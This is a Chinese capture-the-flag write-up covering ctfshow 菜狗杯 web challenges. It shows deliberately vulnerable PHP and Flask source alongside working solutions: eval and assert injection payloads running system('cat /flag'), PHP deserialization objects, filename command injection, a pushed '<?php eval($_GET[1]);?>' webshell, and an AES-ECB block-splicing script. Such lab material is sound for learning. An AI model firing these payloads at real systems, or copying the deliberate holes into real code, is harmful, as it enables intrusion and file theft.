ctfshow菜狗杯 web 无算力以及easyPytHon_P

web签到题

error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);
1
2
3
4

套娃传参
中文要编码

Cookies ：CTFshow-QQ%E7%BE%A4:=a
POST:a=b
GET:?b=c&c[6][0][7][5][8][0][9][4][4]=system('cat /flag');
1
2
3

web2 c0me_t0_s1gn

查看源代码发现一半的flag
控制台提示
到手

我的眼里只有$

error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);
eval中的变量嵌套我们需要一直赋值，36次

1
2
3
4
5
6

import string
s = string.ascii_letters 
t='_=a&'
code="phpinfo();"
for i in range(35):
    t+=s[i]+"="+s[i+1]+'&'
 
t+=s[i]+'='+code
print(t)
1
2
3
4
5
6
7
8
9

自己修改命令就能获得flag了

POST：
_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=J&I=system('cat /f*');
1
2

web抽老婆

明天做

一言既出

num=114514);// 
直接把后面的注释掉
num=114514);(1919810      //括号闭合
num=114514%2b1805296          //利用URL编码 '+' =  '%2b'使得前面绕过后再相加等于1919810绕过
1
2
3
4

驷马难追

<?php
highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){
     if ($_GET['num'] == 114514 && check($_GET['num'])){
              assert("intval($_GET[num])==1919810") or die("一言既出，驷马难追!");
              echo $flag;
     } 
} 

function check($str){
  return !preg_match("/[a-z]|\;|\(|\)/",$str);
} 
1
2
3
4
5
6
7
8
9
10
11
12
13

这次有过滤了但是还是能正常操作

num=114514%2b1805296  
1

TapTapTap

F12发现有一个可疑文件，但是这是真猥琐啊500多行，base64解密

直接访问就行
/secret_path_you_do_not_know/secretfile.txt
1
2

Webshell

 <?php 
    error_reporting(0);

    class Webshell {
        public $cmd = 'echo "Hello World!"';

        public function __construct() {
            $this->init();
        }

        public function init() {
            if (!preg_match('/flag/i', $this->cmd)) {
                $this->exec($this->cmd);
            }
        }

        public function exec($cmd) {
            $result = shell_exec($cmd);
            echo $result;
        }
    }

    if(isset($_GET['cmd'])) {
        $serializecmd = $_GET['cmd'];
        $unserializecmd = unserialize($serializecmd);
        $unserializecmd->init();
    }
    else {
        highlight_file(__FILE__);
    }

?> 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

GET方法传入cmd然后进行反序列化，再进行正则匹配，执行命令

shell_exec：执行命令
unserialize：反序列化

序列化

将类型转换为对象，反序列化反之

<?php
class Webshell {
        public $cmd = 'tac fl*';

}
$j17 = new Webshell();
echo serialize($j17);
echo urlencode(serialize($j17));
?>
1
2
3
4
5
6
7
8
9

?cmd=O:8:"Webshell":1:{s:3:"cmd";s:7:"tac%20fl*";}
1

php反序列化

化零为整

<?php

highlight_file(__FILE__);
include "flag.php";

$result='';

for ($i=1;$i<=count($_GET);$i++){
    if (strlen($_GET[$i])>1){
        die("你太长了！！");
        }
    else{
    $result=$result.$_GET[$i];
    }
}

if ($result ==="大牛"){
    echo $flag;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

count函数是数GET的传入参数个数的

直接用URL编码就可以绕过每次传一个

?1=%E5&2=%A4&3=%A7&4=%E7&5=%89&6=%9B
1

无一幸免

<?php
include "flag.php";
highlight_file(__FILE__);

if (isset($_GET['0'])){
    $arr[$_GET['0']]=1;
    if ($arr[]=1){
        die($flag);
    }
    else{
        die("nonono!");
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13

数组等于1直接传

?0=1
1

传说之下（雾）

F12看js文件发现Game类
控制台传Game.score=3000
再玩一下就行

遍地飘零

<?php
include "flag.php";
highlight_file(__FILE__);

$zeros="000000000000000000000000000000";

foreach($_GET as $key => $value){
    $$key=$$value;
}

if ($flag=="000000000000000000000000000000"){
    echo "好多零";
}else{
    echo "没有零，仔细看看输入有什么问题吧";
    var_dump($_GET);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

foreach形成键值对
var_dump打印变量内容
1
2

直接传入

?_GET=flag
键为_GET,值为flag,直接就会打印flag
1
2

茶歇区

遇事不决抓包我们要刷分，利用整数溢出
只能是e的整数溢出至于为啥我不知道因为其他的溢出回显是
“人要脸树要皮，你怎么拿这么多”

小舔田？

<?php
include "flag.php";
highlight_file(__FILE__);

class Moon{
    public $name="月亮";
    public function __toString(){
        return $this->name;
    }
    
    public function __wakeup(){
        echo "我是".$this->name."快来赏我";
    }
}

class Ion_Fan_Princess{
    public $nickname="牛夫人";

    public function call(){
        global $flag;
        if ($this->nickname=="小甜甜"){
            echo $flag;
        }else{
            echo "以前陪我看月亮的时候，叫人家小甜甜！现在新人胜旧人，叫人家".$this->nickname."。\n";
            echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";
        }
    }
    
    public function __toString(){
        $this->call();
        return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;
    }
}

if (isset($_GET['code'])){
    unserialize($_GET['code']);

}else{
    $a=new Ion_Fan_Princess();
    echo $a;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

先传GET，然后反序列化再进入函数使得等于小甜甜就有flag

<?php
class Moon{
    public $name;
}
 
class Ion_Fan_Princess{
    public $nickname="小甜甜";
 
}
$a = new Moon();
$b = new Ion_Fan_Princess();
$a->name=$b;
echo serialize($a);
1
2
3
4
5
6
7
8
9
10
11
12
13

code=O:4:"Moon":1:{s:4:"name";O:16:"Ion_Fan_Princess":1:{s:8:"nickname";s:9:"小甜甜";}}
1

LSB探姬

#初始化全局变量
app = Flask(__name__)
@app.route('/', methods=['GET'])
def index():    
    return render_template('upload.html')
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        try:
            f = request.files['file']
            f.save('upload/'+f.filename)
            cmd="python3 tsteg.py upload/"+f.filename
            result=os.popen(cmd).read()
            data={"code":0,"cmd":cmd,"result":result,"message":"file uploaded!"}
            return jsonify(data)
        except:
            data={"code":1,"message":"file upload error!"}
            return jsonify(data)
    else:
        return render_template('upload.html')
@app.route('/source', methods=['GET'])
def show_source():
    return render_template('source.html')
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80,debug=False)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

cmd="python3 tsteg.py upload/"+f.filename
利用py3执行文件名，我们在文件名里面拼接命令即可
1
2

Is_Not_Obfuscate

扫描后台
dirb "https://44194809-5de5-4ab4-a3c4-7f5fa8dcc855.challenge.ctf.show/"
1
2

访问/lib.php?flag=0发现不对
改成/lib.php?flag=1发现密文

eJwNkze2o0AABA9EAAI0gmADGGEGEE74DI/w3p1+/wX69euqzpVDJ2a/GkWO4z4QQpnTUq9P5fFd3Uu+YvM2ht+ZXSvYiLXq0o8zaUZ/KSKHeeauPge1HS1rQOaCRvmX5oevKRQajpkc1lMgFhD9uJCH4CSDtZnx8zALzJLhLR2K+WAbhIjf62yY9EFNAfOklJvHScguku8Y5yhtuZSeNGY1vr+NHn6Jn3MYCnm/z9GbI9TH0XZfPPoqqZRrKo48Gdz+odPf29M09uAXmYMftuX5lbIg586dsj8IPGvx3sRUZROiNLXSiM4s1dil6jpvB8cst8uk6ftkZcIF9tF4N0l7mIhew6On6LVPiWk7YaFYcBSI+CLjlUx0heeixgqiWcRtNyHMfs64sx7oVEPY4ZVZg/EmgnR+x6othXTZ2ZGQsEYvRa/U1LaK/4D7Op3ZKrKFnzAs01qSCbbf+P097nH5uUElYiGbytryRvxAe4t1V5PA2dkKlweEANhJ+DU5vzz0+doHA+3opUlU80ol9Ghxas7B3bayW892QCULlB3LuNEEaS2mp1LoXm8dTJAZgM3BGfCHNYbkODF0DqNXrFCMswdFjb9cCnMokKdNZnLUubhW0yA4h807ywaHFZvPxCuG05XdxV6nLiZapgdgHjFpXFbnrwz9LIzLCGMw+F7BHMJPheaGD3faUo71nCiV6QWQu0VW/O2DvG+eubaq5t1a5Y3tYJmti6soht26kuF7jUUg+vZz3guJPIhqEvujvCubvp9WFznqRBETu6RM8yssRUdkXOcelo3bvnM3onXcf9+kQvcSUbuwuEnWHYzn16/ewTo+gVIqv0+DNJC0YUGs9kWnS2+1sAvpdp6qe46VGHNv5Ehm8XNg9SPQyrFYwqRuQZZ/r2muD0WE4G5qRRQ8dnmkgxTVF7Zh61/yvmis14AVf3UwjoHywgVs7MNevg/tCL4JwsgHx6FLo0CANOoThXQcpMmu1ZcY+MB7L5c4S+5arvpFKn/GN4KvCEWYZ+r7inzI+ng3O1T0eaaqFmy63HfCz4xYWYn4PFjC7ukhBJfY7E+fPm6bO7/jSe+2SuGuZ5Crxj8yPiLLA1h61snzuxvqfM0ulqNmp/SzwQLyo5N5HVZEVzMdqY7RiEqT6/FOLji7N/7E3c+8ZLOGGQcDJMM5FARuDOfYyh09+M+I1Hdc+bCze4S0TuOa3j7orHPzP/BLQQLKt6c4cLZ42QbgJwmpowDmVjo/R6dyCuJbWwKGS8BVtzxfh2YhYu+r1n7mrY7nPTxszI6w/TWAErJEBVZwXlj33RDqfi+u45uVP292vZOCDP0RHKuVL20QeMwhqsY47fQ7ZuLeKP/9+w8pT7oT
1

<!-- //测试执行加密后的插件代码 
	   //这里只能执行加密代码，非加密代码不能执行
	  eval(decode($_GET['input'])); -->
<!-- <button name="action" value="test"> 执行 (do)</button>-->
1
2
3
4

?input=eJwNkze2o0AABA9EAAI0gmADGGEGEE74DI%2Fw3p1%2B%2FwX69euqzpVDJ2a%2FGkWO4z4QQpnTUq9P5fFd3Uu%2BYvM2ht%2BZXSvYiLXq0o8zaUZ%2FKSKHeeauPge1HS1rQOaCRvmX5oevKRQajpkc1lMgFhD9uJCH4CSDtZnx8zALzJLhLR2K%2BWAbhIjf62yY9EFNAfOklJvHScguku8Y5yhtuZSeNGY1vr%2BNHn6Jn3MYCnm%2Fz9GbI9TH0XZfPPoqqZRrKo48Gdz%2BodPf29M09uAXmYMftuX5lbIg586dsj8IPGvx3sRUZROiNLXSiM4s1dil6jpvB8cst8uk6ftkZcIF9tF4N0l7mIhew6On6LVPiWk7YaFYcBSI%2BCLjlUx0heeixgqiWcRtNyHMfs64sx7oVEPY4ZVZg%2FEmgnR%2Bx6othXTZ2ZGQsEYvRa%2FU1LaK%2F4D7Op3ZKrKFnzAs01qSCbbf%2BP097nH5uUElYiGbytryRvxAe4t1V5PA2dkKlweEANhJ%2BDU5vzz0%2BdoHA%2B3opUlU80ol9Ghxas7B3bayW892QCULlB3LuNEEaS2mp1LoXm8dTJAZgM3BGfCHNYbkODF0DqNXrFCMswdFjb9cCnMokKdNZnLUubhW0yA4h807ywaHFZvPxCuG05XdxV6nLiZapgdgHjFpXFbnrwz9LIzLCGMw%2BF7BHMJPheaGD3faUo71nCiV6QWQu0VW%2FO2DvG%2Beubaq5t1a5Y3tYJmti6soht26kuF7jUUg%2BvZz3guJPIhqEvujvCubvp9WFznqRBETu6RM8yssRUdkXOcelo3bvnM3onXcf9%2BkQvcSUbuwuEnWHYzn16%2FewTo%2BgVIqv0%2BDNJC0YUGs9kWnS2%2B1sAvpdp6qe46VGHNv5Ehm8XNg9SPQyrFYwqRuQZZ%2Fr2muD0WE4G5qRRQ8dnmkgxTVF7Zh61%2Fyvmis14AVf3UwjoHywgVs7MNevg%2FtCL4JwsgHx6FLo0CANOoThXQcpMmu1ZcY%2BMB7L5c4S%2B5arvpFKn%2FGN4KvCEWYZ%2Br7inzI%2Bng3O1T0eaaqFmy63HfCz4xYWYn4PFjC7ukhBJfY7E%2BfPm6bO7%2FjSe%2B2SuGuZ5Crxj8yPiLLA1h61snzuxvqfM0ulqNmp%2FSzwQLyo5N5HVZEVzMdqY7RiEqT6%2FFOLji7N%2F7E3c%2B8ZLOGGQcDJMM5FARuDOfYyh09%2BM%2BI1Hdc%2BbCze4S0TuOa3j7orHPzP%2FBLQQLKt6c4cLZ42QbgJwmpowDmVjo%2FR6dyCuJbWwKGS8BVtzxfh2YhYu%2Br1n7mrY7nPTxszI6w%2FTWAErJEBVZwXlj33RDqfi%2Bu45uVP292vZOCDP0RHKuVL20QeMwhqsY47fQ7ZuLeKP%2F9%2Bw8pT7oT&action=test
1

Anything is good?Please test it. <?php
header("Content-Type:text/html;charset=utf-8");
include 'lib.php';
if(!is_dir('./plugins/')){
    @mkdir('./plugins/', 0777);
}
//Test it and delete it ！！！
//测试执行加密后的插件代码
if($_GET['action'] === 'test') {
    echo 'Anything is good?Please test it.';
    @eval(decode($_GET['input']));
}

ini_set('open_basedir', './plugins/');
if(!empty($_GET['action'])){
    switch ($_GET['action']){
        case 'pull':
            $output = @eval(decode(file_get_contents('./plugins/'.$_GET['input'])));
            echo "pull success";
            break;
        case 'push':
            $input = file_put_contents('./plugins/'.md5($_GET['output'].'youyou'), encode($_GET['output']));
            echo "push success";
            break;
        default:
            die('hacker!');
    }
}

?> 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

有push和pull两种
先push

?action=push&output=<?php eval($_GET[1]);?>
1

# 导入md5 加密所需模块
import hashlib
# 创建md5 对象
m = hashlib.md5()
# 生成加密串，其中password 是要加密的字符串
m.update("<?php eval($_GET[1]);?>youyou".encode('utf-8'))
# 获取加密串
pw = m.hexdigest()
print(pw)
1
2
3
4
5
6
7
8
9
'
运行
运行

加密结果
d6e1f0ec8980b49f6061227495a77a44
1
2

?action=pull&input=d6e1f0ec8980b49f6061227495a77a44
成功之后加命令
&1=system('ls /');
&1=system('cat /f*');
1
2
3
4

龙珠NFT

点击开始搜索获得base64

JyhoO0yyT0T55xPULlCbrF1n4l7QipBqiQZXUxm6t/gT1Uc1OSjfXZwIqniz+k2BZ54GXZxmExeDFBVioovwa3G+Vh2aZRF0YaR1fIyEHMqv1y5h+y7jn0vi42/oJnRKWtpP3Oj8IyMqdIB3Am1/RqTyAAmXKNHNvKZrOcLlSBo=
1

这个是 AES_ECB解密不会解密，MD一个web怎么这么多解密

    项目简介
    开始搜索
    查看库存
    查看源码

源代码

</>

    # !/usr/bin/env python
    # -*-coding:utf-8 -*-
    """
    # File       : app.py
    # Time       ：2022/10/20 15:16
    # Author     ：g4_simon
    # version    ：python 3.9.7
    # Description：DragonBall Radar (BlockChain)
    """
    import hashlib
    from flask import *
    import os
    import json
    import hashlib
    from Crypto.Cipher import AES
    import random
    import time
    import base64
    #网上找的AES加密代码，加密我又不懂，加就完事儿了
    class AESCipher():
        def __init__(self,key):
            self.key = self.add_16(hashlib.md5(key.encode()).hexdigest()[:16])
            self.model = AES.MODE_ECB
            self.aes = AES.new(self.key,self.model)
        def add_16(self,par):
            if type(par) == str:
                par = par.encode()
            while len(par) % 16 != 0:
                par += b'\x00'
            return par
        def aesencrypt(self,text):
            text = self.add_16(text)
            self.encrypt_text = self.aes.encrypt(text)
            return self.encrypt_text
        def aesdecrypt(self,text):
            self.decrypt_text = self.aes.decrypt(text)
            self.decrypt_text = self.decrypt_text.strip(b"\x00")
            return self.decrypt_text
    #初始化全局变量
    app = Flask(__name__)
    flag=os.getenv('FLAG')
    AES_ECB=AESCipher(flag)
    app.config['JSON_AS_ASCII'] = False
    #懒得弄数据库或者类，直接弄字典就完事儿了
    players={}
    @app.route('/', methods=['GET'])
    def index():
        """
        提供登录功能
        """
    @app.route('/radar',methods=['GET','POST'])
    def radar():
       """
       提供雷达界面
       """
    @app.route('/find_dragonball',methods=['GET','POST'])
    def  find_dragonball():
        """
        找龙珠，返回龙珠地址
        """
        xxxxxxxxxxx#无用代码可以忽略
        if search_count==10:#第一次搜寻，给一个一星龙珠
            dragonball="1"
        elif search_count<=0:
            data={"code":1,"msg":"搜寻次数已用完"}
            return jsonify(data)
        else:
            random_num=random.randint(1,1000)
            if random_num<=6:
                dragonball=一个没拿过的球，比如'6'
            else:
                dragonball='0'#0就代表没有发现龙珠
        players[player_id]['search_count']=search_count-1
        data={'player_id':player_id,'dragonball':dragonball,'round_no':str(11-search_count),'time':time.strftime('%Y-%m-%d %H:%M:%S')}
        #json.dumps(data)='{"player_id": "572d4e421e5e6b9bc11d815e8a027112", "dragonball": "1", "round_no": "9", "time":"2022-10-19 15:06:45"}'
        data['address']= base64.b64encode(AES_ECB.aesencrypt(json.dumps(data))).decode()
        return jsonify(data)
    @app.route('/get_dragonball',methods=['GET','POST'])
    def get_dragonball():
        """
        根据龙珠地址解密后添加到用户信息
        """
        xxxxxxxxx#无用代码可以忽略
        try:
            player_id=request.cookies.get("player_id")
            address=request.args.get('address')
            data=AES_ECB.aesdecrypt(base64.b64decode(address))
            data=json.loads(data.decode())
            if data['dragonball'] !="0":
                players[data['player_id']]['dragonballs'].append(data['dragonball'])
                return jsonify({'get_ball':data['dragonball']})
            else:
                return jsonify({'code':1,'msg':"这个地址没有发现龙珠"})
        except:
            return jsonify({'code':1,'msg':"你干啥???????"})
    @app.route('/flag',methods=['GET','POST'])
    def get_flag():
        """
        查看龙珠库存
        """
        #如果有7颗龙珠就拿到flag~
    @app.route('/source',methods=['GET','POST'])
    def get_source():
        """
        查看源代码
        """
    if __name__ == '__main__':
        app.run(host='0.0.0.0',port=80,debug=False)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117

脚本

import requests
import base64
import re
from urllib.parse import *

url = 'http://5da1fd16-7436-4635-838a-502be4f68729.challenge.ctf.show/'
sess = requests.Session()

sess.get(url+'?username=1')
for i in range(7):
    url1 = url + 'find_dragonball'
    r1 = sess.get(url1)
    a = r1.json()["address"]
    b = base64.b64decode(a.encode()).hex()

    c = b[:128]+b[160:]

    d = quote(base64.b64encode(bytes.fromhex(c)).decode())

    url2 = url + f'get_dragonball?address={d}'
    r2 = sess.get(url2)
    print(r2.text)
r3  = sess.get(url+'flag')
flag = re.findall('ctfshow{.*?}',r3.text)[0]
print(flag)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25